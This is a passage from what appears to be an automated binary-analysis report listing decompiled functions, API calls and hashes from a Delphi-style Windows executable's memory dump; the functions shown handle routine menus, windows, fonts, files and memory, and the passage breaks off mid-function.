                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                • String ID:
                                                                                • API String ID: 2198039625-0
                                                                                • Opcode ID: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction ID: e9a11356e23c73f42dbca714b493990e2baf7ab793a4ed1f979a99725cee0618
                                                                                • Opcode Fuzzy Hash: 40b5213d90e1f6223c6eae0d1e643623537daa9ac4c850ee3c106ff55ed6b37c
                                                                                • Instruction Fuzzy Hash: 9331F874B00614EFC704EB59D981D4EB3F5EF48314B6241A6E404AB362D678AE80EB44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00449170(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                                				intOrPtr _v8;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				int _t27;
                                                                                				void* _t40;
                                                                                				int _t41;
                                                                                				int _t50;
                                                                                
                                                                                				_t50 = _t41;
                                                                                				_t49 = __edx;
                                                                                				_t40 = __eax;
                                                                                				if(E0044887C(__eax) == 0) {
                                                                                					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                                				}
                                                                                				_v8 = 0;
                                                                                				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                                					_t27 = GetMenuItemID(_t49, _t50);
                                                                                					_t51 = _t27;
                                                                                					if(_t27 != 0xffffffff) {
                                                                                						_v8 = E004486F8(_t40, 0, _t51);
                                                                                					}
                                                                                				} else {
                                                                                					_t49 = GetSubMenu(_t49, _t50);
                                                                                					_v8 = E004486F8(_t40, 1, _t37);
                                                                                				}
                                                                                				if(_v8 == 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					 *_a12 = 0;
                                                                                					E00408BFC(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                                					return E00408B40(_a12, _t49);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$ItemStateString
                                                                                • String ID:
                                                                                • API String ID: 306270399-0
                                                                                • Opcode ID: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction ID: e1c24750740d557e1e8c84f7fe76103c4d55c31368cde85f8e0fd78e7a4e0c38
                                                                                • Opcode Fuzzy Hash: a51c3bca0f35a20612332bc3a4a573b4f11e14603d658cd76a0853a35b361683
                                                                                • Instruction Fuzzy Hash: 7011B431301214AFE700EE6DCC85DAF77E8AF49354B10446EF919E7382CA38ED01A7A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045AF4C(intOrPtr* __eax, int __ecx, RECT* __edx) {
                                                                                				int _t9;
                                                                                				int _t12;
                                                                                				int _t26;
                                                                                				int _t34;
                                                                                				int _t37;
                                                                                				intOrPtr* _t43;
                                                                                				int* _t44;
                                                                                
                                                                                				_t37 = __ecx;
                                                                                				_t44 = __edx;
                                                                                				_t43 = __eax;
                                                                                				_t9 = IsRectEmpty(__edx);
                                                                                				_t47 = _t9;
                                                                                				if(_t9 != 0) {
                                                                                					return E0045AEE4(_t43, _t47);
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t43 + 0x94))();
                                                                                				__eflags = _t37;
                                                                                				if(_t37 != 0) {
                                                                                					L5:
                                                                                					_t12 = 1;
                                                                                				} else {
                                                                                					_t34 = IsWindowVisible(E0043BD14(_t43));
                                                                                					__eflags = _t34;
                                                                                					if(_t34 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_t12 = 0;
                                                                                					}
                                                                                				}
                                                                                				E0045AE60(_t43);
                                                                                				SetWindowPos(E0043BD14(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
                                                                                				 *((intOrPtr*)( *_t43 + 0xf8))();
                                                                                				__eflags = _t12;
                                                                                				if(__eflags != 0) {
                                                                                					E0045AE60(_t43);
                                                                                				}
                                                                                				_t26 = E004037B0( *((intOrPtr*)(_t43 + 0x240)), __eflags);
                                                                                				__eflags = _t26;
                                                                                				if(_t26 != 0) {
                                                                                					return SetFocus(E0043BD14(_t43));
                                                                                				}
                                                                                				return _t26;
                                                                                			}

                                                                                APIs
                                                                                • IsRectEmpty.USER32 ref: 0045AF57
                                                                                • IsWindowVisible.USER32(00000000), ref: 0045AF82
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFBA
                                                                                • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045B063,0045FEAC), ref: 0045AFEF
                                                                                  • Part of subcall function 0045AEE4: IsWindowVisible.USER32(00000000), ref: 0045AEFB
                                                                                  • Part of subcall function 0045AEE4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF22
                                                                                  • Part of subcall function 0045AEE4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,0045FD56,0045FD5E,?,?,0045B6B4), ref: 0045AF42
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$FocusVisible$EmptyRect
                                                                                • String ID:
                                                                                • API String ID: 698668684-0
                                                                                • Opcode ID: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction ID: aa951be320cb66b1e7991dbc00dcf3a6d2376953a5889a30f220f311acb53e10
                                                                                • Opcode Fuzzy Hash: 36b04a0efda56d6c7fd9ea4d84da65bd67b35b67db63215a326bf2bc792afe28
                                                                                • Instruction Fuzzy Hash: B711A7713001015BC611A67A8841B7BA38D9F4534AF08462AFA54DB343DB2DDC19976E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00421FDC(int __eax, intOrPtr __ecx, void* __edx) {
                                                                                				struct tagRECT _v32;
                                                                                				int _t11;
                                                                                				void* _t21;
                                                                                				void* _t23;
                                                                                				int _t26;
                                                                                				void* _t30;
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                
                                                                                				_t11 = __eax;
                                                                                				_v32.bottom = __ecx;
                                                                                				_t30 = __edx;
                                                                                				_t26 = __eax;
                                                                                				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
                                                                                					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                					_t36 = 0;
                                                                                					if(_t33 != 0) {
                                                                                						_push(0xffffffff);
                                                                                						_push(_t33);
                                                                                						_t23 = E0041FDC4(__edx);
                                                                                						_push(_t23);
                                                                                						L00406BD0();
                                                                                						_t36 = _t23;
                                                                                						_push(E0041FDC4(_t30));
                                                                                						L00406BA0();
                                                                                					}
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_t32 = _t30;
                                                                                					_t35 = _t33;
                                                                                					_v32.right = _v32.right - 1;
                                                                                					_v32.bottom = _v32.bottom - 1;
                                                                                					_t11 = PlayEnhMetaFile(E0041FDC4(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
                                                                                					if(_t35 != 0) {
                                                                                						_push(0xffffffff);
                                                                                						_push(_t36);
                                                                                						_t21 = E0041FDC4(_t32);
                                                                                						_push(_t21);
                                                                                						L00406BD0();
                                                                                						return _t21;
                                                                                					}
                                                                                				}
                                                                                				return _t11;
                                                                                			}














                                                                                APIs
                                                                                • 72E7B410.GDI32(00000000,00000000,000000FF), ref: 0042200A
                                                                                • 72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 00422019
                                                                                • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 0042204B
                                                                                • 72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 0042205F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B410$B150FileMetaPlay
                                                                                • String ID:
                                                                                • API String ID: 1962039817-0
                                                                                • Opcode ID: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction ID: f4c557c1bb24d42774a62b44b8927d735ce660dfbc53d9c91e84fbf4e2c165a0
                                                                                • Opcode Fuzzy Hash: f15c074b92c496038122854ebc95fcd552bcea9610ee8adc800de6ad237f33db
                                                                                • Instruction Fuzzy Hash: 7101A5716042206BC610BA69DC449ABB3ED9F85338F05063BF919EB382D679DC45C6E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004545F8(void* __eax, void* __ecx, char __edx) {
                                                                                				char _v12;
                                                                                				struct HWND__* _v20;
                                                                                				int _t17;
                                                                                				void* _t27;
                                                                                				struct HWND__* _t33;
                                                                                				void* _t35;
                                                                                				void* _t36;
                                                                                				long _t37;
                                                                                
                                                                                				_t37 = _t36 + 0xfffffff8;
                                                                                				_t27 = __eax;
                                                                                				_t17 =  *0x487bfc; // 0x2291310
                                                                                				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                                                					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                                                						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                                                						_v12 = __edx;
                                                                                						EnumWindows(E00454588, _t37);
                                                                                						_t5 = _t27 + 0x90; // 0x0
                                                                                						_t17 =  *_t5;
                                                                                						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                                                							_t33 = GetWindow(_v20, 3);
                                                                                							_v20 = _t33;
                                                                                							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                                                								_v20 = 0xfffffffe;
                                                                                							}
                                                                                							_t10 = _t27 + 0x90; // 0x0
                                                                                							_t17 =  *_t10;
                                                                                							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                                                							if(_t35 >= 0) {
                                                                                								do {
                                                                                									_t13 = _t27 + 0x90; // 0x0
                                                                                									_t17 = SetWindowPos(E00413FA4( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                                                									_t35 = _t35 - 1;
                                                                                								} while (_t35 != 0xffffffff);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                                                				}
                                                                                				return _t17;
                                                                                			}












                                                                                APIs
                                                                                • EnumWindows.USER32(00454588), ref: 0045462D
                                                                                • GetWindow.USER32(00000003,00000003), ref: 00454645
                                                                                • GetWindowLongA.USER32 ref: 00454652
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00454691
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID:
                                                                                • API String ID: 4191631535-0
                                                                                • Opcode ID: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction ID: 5cb2c35cb50d504b52006ad56c3c00fd2761b840e39f3ce058a847bbcc87ac37
                                                                                • Opcode Fuzzy Hash: 54b30549b5890034c280d358ad55b6b187d1585eb2e61102c1a7ec289f303aab
                                                                                • Instruction Fuzzy Hash: C1119E70604200AFDB10AA68CC85F9673A8AB85729F15027AFD58AF2D3C3789C85CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040889C(WORD* __eax) {
                                                                                				struct _FILETIME _v12;
                                                                                				long _t20;
                                                                                				WORD* _t30;
                                                                                				void* _t35;
                                                                                				struct _FILETIME* _t36;
                                                                                
                                                                                				_t36 = _t35 + 0xfffffff8;
                                                                                				_t30 = __eax;
                                                                                				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                                                                					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                                                                						continue;
                                                                                					} else {
                                                                                						_t20 = GetLastError();
                                                                                					}
                                                                                					L5:
                                                                                					return _t20;
                                                                                				}
                                                                                				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                                                                				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                                                                				_t30[2] = _t30[0x1c];
                                                                                				_t30[4] = _t30[0xc].dwFileAttributes;
                                                                                				E00404588( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                                                                				_t20 = 0;
                                                                                				goto L5;
                                                                                			}









                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004088AC
                                                                                • GetLastError.KERNEL32(?,?), ref: 004088B5
                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                • FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                • String ID:
                                                                                • API String ID: 2103556486-0
                                                                                • Opcode ID: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction ID: dd138b2cbfea1a41325b38cdf14aeadd6a2b6169d3a22f7e4d744e8d557f4554
                                                                                • Opcode Fuzzy Hash: faf4f9093bdd09ba35a4a8d2195ad12253dd24e254ffb0e310f1718714673121
                                                                                • Instruction Fuzzy Hash: 92F062B35002009FDB04FFA5C9C288733ACEB4431475084BBED05EB286EA38D51487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453F14(void* __ecx) {
                                                                                				void* _t2;
                                                                                				DWORD* _t7;
                                                                                
                                                                                				_t2 =  *0x487bfc; // 0x2291310
                                                                                				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                                					if( *0x487c14 == 0) {
                                                                                						_t2 = SetWindowsHookExA(3, E00453ED0, 0, GetCurrentThreadId());
                                                                                						 *0x487c14 = _t2;
                                                                                					}
                                                                                					if( *0x487c10 == 0) {
                                                                                						_t2 = CreateEventA(0, 0, 0, 0);
                                                                                						 *0x487c10 = _t2;
                                                                                					}
                                                                                					if( *0x487c18 == 0) {
                                                                                						_t2 = CreateThread(0, 0x3e8, E00453E74, 0, 0, _t7);
                                                                                						 *0x487c18 = _t2;
                                                                                					}
                                                                                				}
                                                                                				return _t2;
                                                                                			}






                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453F2C
                                                                                • SetWindowsHookExA.USER32 ref: 00453F3C
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453F57
                                                                                • CreateThread.KERNEL32(00000000,000003E8,00453E74,00000000,00000000), ref: 00453F7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateThread$CurrentEventHookWindows
                                                                                • String ID:
                                                                                • API String ID: 1195359707-0
                                                                                • Opcode ID: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction ID: e28856fd365dcb9ea9107fa12257fb98ca3ea3d1382ea9896caf25c5995a26e3
                                                                                • Opcode Fuzzy Hash: 0444d7c6d4168982272ff5612d8d20d92426553b9994da3837f237603c9db872
                                                                                • Instruction Fuzzy Hash: F6F03071B8D300AEF7106B659D57F1A25A4A310B97F201C7EF6046A1D2C7B85AC487AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00423690(void* __eflags) {
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr _t19;
                                                                                				void* _t20;
                                                                                
                                                                                				DeleteObject( *(_t20 - 0x10));
                                                                                				E00403DA8();
                                                                                				E00403DFC();
                                                                                				_pop(_t19);
                                                                                				 *[fs:eax] = _t19;
                                                                                				_push(0x4236e1);
                                                                                				DeleteDC( *(_t20 - 0x1c));
                                                                                				_t13 =  *((intOrPtr*)(_t20 - 0x18));
                                                                                				_push(_t13);
                                                                                				_push(0);
                                                                                				L00407080();
                                                                                				if( *(_t20 - 0x10) != 0) {
                                                                                					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
                                                                                				}
                                                                                				return _t13;
                                                                                			}







                                                                                APIs
                                                                                • DeleteObject.GDI32(?), ref: 00423694
                                                                                • DeleteDC.GDI32(?), ref: 004236B4
                                                                                • 72E7B380.USER32(00000000,?,?,004236E1), ref: 004236BF
                                                                                • GetObjectA.GDI32(?,00000054,?), ref: 004236D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: DeleteObject$B380
                                                                                • String ID:
                                                                                • API String ID: 2559486108-0
                                                                                • Opcode ID: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction ID: 3429551c4f657d278ba83dca6c20dc1383fca88764dbb818c78fe85dd7b7e0e0
                                                                                • Opcode Fuzzy Hash: ac684a19cf7d03bdfc4d5038e7ab89f884e0849e1027b05f98d6bf5ae10dfc53
                                                                                • Instruction Fuzzy Hash: 68E03071B04215AAEB14FBE9D842B7E77BCEF44305F50482AB510E61C1C63CA9108B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407220(void* __eax, int __ecx, long __edx) {
                                                                                				void* _t2;
                                                                                				void* _t4;
                                                                                
                                                                                				_t2 = GlobalHandle(__eax);
                                                                                				GlobalUnWire(_t2);
                                                                                				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                                                                				GlobalFix(_t4);
                                                                                				return _t4;
                                                                                			}






                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleWire
                                                                                • String ID:
                                                                                • API String ID: 2210401237-0
                                                                                • Opcode ID: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction ID: 1a6e8ccd0a1480b6cc6632480fba39d70e8d35f598ec30b1080dd49c18280503
                                                                                • Opcode Fuzzy Hash: b242d88203f85b8996b776b6ff7dd028c4c5f6cd2c22e953581b3ac5f44f8ee0
                                                                                • Instruction Fuzzy Hash: 0EB009D489030439E80433B64E4FE3B002C989070978249BE3442F2882D87CA860803D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0041EB60(void* __eax, void* __ebx, void* __ecx) {
                                                                                				signed int _v8;
                                                                                				struct tagLOGFONTA _v68;
                                                                                				char _v72;
                                                                                				char _v76;
                                                                                				char _v80;
                                                                                				intOrPtr _t76;
                                                                                				intOrPtr _t81;
                                                                                				void* _t107;
                                                                                				void* _t116;
                                                                                				intOrPtr _t126;
                                                                                				void* _t137;
                                                                                				void* _t138;
                                                                                				intOrPtr _t139;
                                                                                
                                                                                				_t137 = _t138;
                                                                                				_t139 = _t138 + 0xffffffb4;
                                                                                				_v80 = 0;
                                                                                				_v76 = 0;
                                                                                				_v72 = 0;
                                                                                				_t116 = __eax;
                                                                                				_push(_t137);
                                                                                				_push(0x41ece9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t139;
                                                                                				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                                				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                					 *[fs:eax] = 0;
                                                                                					_push(E0041ECF0);
                                                                                					return E00404344( &_v80, 3);
                                                                                				} else {
                                                                                					_t76 =  *0x487a74; // 0x2290ad8
                                                                                					E0041DEE4(_t76);
                                                                                					_push(_t137);
                                                                                					_push(0x41ecc1);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t139;
                                                                                					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                						_v68.lfHeight =  *(_v8 + 0x14);
                                                                                						_v68.lfWidth = 0;
                                                                                						_v68.lfEscapement = 0;
                                                                                						_v68.lfOrientation = 0;
                                                                                						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                                							_v68.lfWeight = 0x190;
                                                                                						} else {
                                                                                							_v68.lfWeight = 0x2bc;
                                                                                						}
                                                                                						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                                						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                                						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                                						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                                						E0040457C( &_v72, _v8 + 0x1b);
                                                                                						if(E00408594(_v72, "Default") != 0) {
                                                                                							E0040457C( &_v80, _v8 + 0x1b);
                                                                                							E00408BD8( &(_v68.lfFaceName), _v80);
                                                                                						} else {
                                                                                							E0040457C( &_v76, "\rMS Sans Serif");
                                                                                							E00408BD8( &(_v68.lfFaceName), _v76);
                                                                                						}
                                                                                						_v68.lfQuality = 0;
                                                                                						_v68.lfOutPrecision = 0;
                                                                                						_v68.lfClipPrecision = 0;
                                                                                						_t107 = E0041EE44(_t116) - 1;
                                                                                						if(_t107 == 0) {
                                                                                							_v68.lfPitchAndFamily = 2;
                                                                                						} else {
                                                                                							if(_t107 == 1) {
                                                                                								_v68.lfPitchAndFamily = 1;
                                                                                							} else {
                                                                                								_v68.lfPitchAndFamily = 0;
                                                                                							}
                                                                                						}
                                                                                						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                                					}
                                                                                					_pop(_t126);
                                                                                					 *[fs:eax] = _t126;
                                                                                					_push(0x41ecc8);
                                                                                					_t81 =  *0x487a74; // 0x2290ad8
                                                                                					return E0041DEF0(_t81);
                                                                                				}
                                                                                			}

















                                                                                APIs
                                                                                  • Part of subcall function 0041DEE4: RtlEnterCriticalSection.KERNEL32(?,0041DF21), ref: 0041DEE8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CreateCriticalEnterFontIndirectSection
                                                                                • String ID: MS Sans Serif$Default
                                                                                • API String ID: 2931345757-2137701257
                                                                                • Opcode ID: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction ID: e60251e722a7b7db74474c537270072edb21ad5dc5872d212219de67613c1dc8
                                                                                • Opcode Fuzzy Hash: 003712182c8eaff7deaab1224c24189ed19d4a75f6a5e48ecdcb400a55ac035d
                                                                                • Instruction Fuzzy Hash: D1516474A04248DFDB01CFA9C981BCDBBF5EF48304F6544AAE800A7352E3389E45DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E0040A4C4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                				char _v8;
                                                                                				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                				char _v297;
                                                                                				char _v304;
                                                                                				intOrPtr _v308;
                                                                                				char _v312;
                                                                                				char _v316;
                                                                                				char _v320;
                                                                                				intOrPtr _v324;
                                                                                				char _v328;
                                                                                				void* _v332;
                                                                                				char _v336;
                                                                                				char _v340;
                                                                                				char _v344;
                                                                                				char _v348;
                                                                                				intOrPtr _v352;
                                                                                				char _v356;
                                                                                				char _v360;
                                                                                				char _v364;
                                                                                				void* _v368;
                                                                                				char _v372;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t82;
                                                                                				intOrPtr _t86;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t101;
                                                                                				void* _t108;
                                                                                				intOrPtr _t110;
                                                                                				void* _t113;
                                                                                
                                                                                				_t108 = __edi;
                                                                                				_v372 = 0;
                                                                                				_v336 = 0;
                                                                                				_v344 = 0;
                                                                                				_v340 = 0;
                                                                                				_v8 = 0;
                                                                                				_push(_t113);
                                                                                				_push(0x40a67f);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t113 + 0xfffffe90;
                                                                                				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                                                				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                                                					_t52 =  *0x486c64; // 0x40751c
                                                                                					E00406520(_t52,  &_v8);
                                                                                				} else {
                                                                                					_t86 =  *0x486dd4; // 0x407514
                                                                                					E00406520(_t86,  &_v8);
                                                                                				}
                                                                                				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                                                				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
